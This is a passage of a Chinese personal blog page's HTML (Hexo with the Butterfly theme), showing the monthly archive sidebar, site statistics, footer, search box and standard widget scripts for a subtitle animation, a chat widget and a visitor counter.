    <i class="fas fa-angle-right"></i></a></div><ul class="card-archive-list"><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/10/"><span class="card-archive-list-date">十月 2023</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/09/"><span class="card-archive-list-date">九月 2023</span><span class="card-archive-list-count">3</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/08/"><span class="card-archive-list-date">八月 2023</span><span class="card-archive-list-count">2</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/06/"><span class="card-archive-list-date">六月 2023</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/02/"><span class="card-archive-list-date">二月 2023</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/01/"><span class="card-archive-list-date">一月 2023</span><span class="card-archive-list-count">3</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2022/09/"><span class="card-archive-list-date">九月 2022</span><span class="card-archive-list-count">2</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2022/08/"><span class="card-archive-list-date">八月 2022</span><span class="card-archive-list-count">6</span></a></li></ul></div><div class="card-widget card-webinfo"><div class="item-headline"><i class="fas fa-chart-line"></i><span>网站资讯</span></div><div class="webinfo"><div class="webinfo-item"><div class="item-name">文章数目 :</div><div class="item-count">61</div></div><div class="webinfo-item"><div class="item-name">已运行时间 :</div><div class="item-count" id="runtimeshow" data-publishDate="2019-11-30T16:00:00.000Z"><i class="fa-solid fa-spinner fa-spin"></i></div></div><div class="webinfo-item"><div class="item-name">本站访客数 :</div><div class="item-count" id="busuanzi_value_site_uv"><i class="fa-solid fa-spinner fa-spin"></i></div></div><div class="webinfo-item"><div class="item-name">本站总访问量 :</div><div class="item-count" id="busuanzi_value_site_pv"><i class="fa-solid fa-spinner fa-spin"></i></div></div><div class="webinfo-item"><div class="item-name">最后更新时间 :</div><div class="item-count" id="last-push-date" data-lastPushDate="2023-10-21T04:23:56.038Z"><i class="fa-solid fa-spinner fa-spin"></i></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2019 - 2023 By MocusEZ</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener external nofollow noreferrer" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div><div class="footer_custom_text"><a href="http://beian.miit.gov.cn/" rel="external nofollow noreferrer"  style="color:#f72b07" target="_blank">闽ICP备2021003009号</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div id="local-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><span id="loading-status"></span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="is-center" id="loading-database"><i class="fas fa-spinner fa-pulse"></i><span>  数据库加载中</span></div><div class="search-wrap"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"/></div></div><hr/><div id="local-search-results"></div></div></div><div id="search-mask"></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><script src="/js/search/local-search.js"></script><div class="js-pjax"><script>function subtitleType () {
  if (true) { 
    window.typed = new Typed("#subtitle", {
      strings: ["初看前路近可至，细思百事竞待忙","认知，信条，教导"],
      startDelay: 300,
      typeSpeed: 150,
      loop: true,
      backSpeed: 50
    })
  } else {
    document.getElementById("subtitle").innerHTML = '初看前路近可至，细思百事竞待忙'
  }
}

if (true) {
  if (typeof Typed === 'function') {
    subtitleType()
  } else {
    getScript('https://cdn.jsdelivr.net/npm/typed.js/lib/typed.min.js').then(subtitleType)
  }
} else {
  subtitleType()
}</script></div><script>(function(i,s,o,g,r,a,m){i["DaoVoiceObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;a.charset="utf-8";m.parentNode.insertBefore(a,m)})(window,document,"script",('https:' == document.location.protocol ? 'https:' : 'http:') + "//widget.daovoice.io/widget/1df8ba05.js","daovoice")
</script><script>var isChatBtn = false
daovoice('init', {
  app_id: '1df8ba05',},{
  launcher: { 
     disableLauncherIcon: isChatBtn // 悬浮 ICON 是否显示
  },
});
daovoice('update');

if (isChatBtn) {
  var chatBtnFn = () => {
    var chatBtn = document.getElementById("chat_btn")
    chatBtn.addEventListener("click", function(){
      daovoice('show')
    });
  }
  chatBtnFn()
} else {
  if (false) {
    function chatBtnHide () {
      daovoice('update', {},{
        launcher: { 
        disableLauncherIcon: true // 悬浮 ICON 是否显示
        },
      });
    }
    function chatBtnShow () {
      daovoice('update', {},{
        launcher: { 
        disableLauncherIcon: false // 悬浮 ICON 是否显示
        },
      });
    }
  }
}</script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>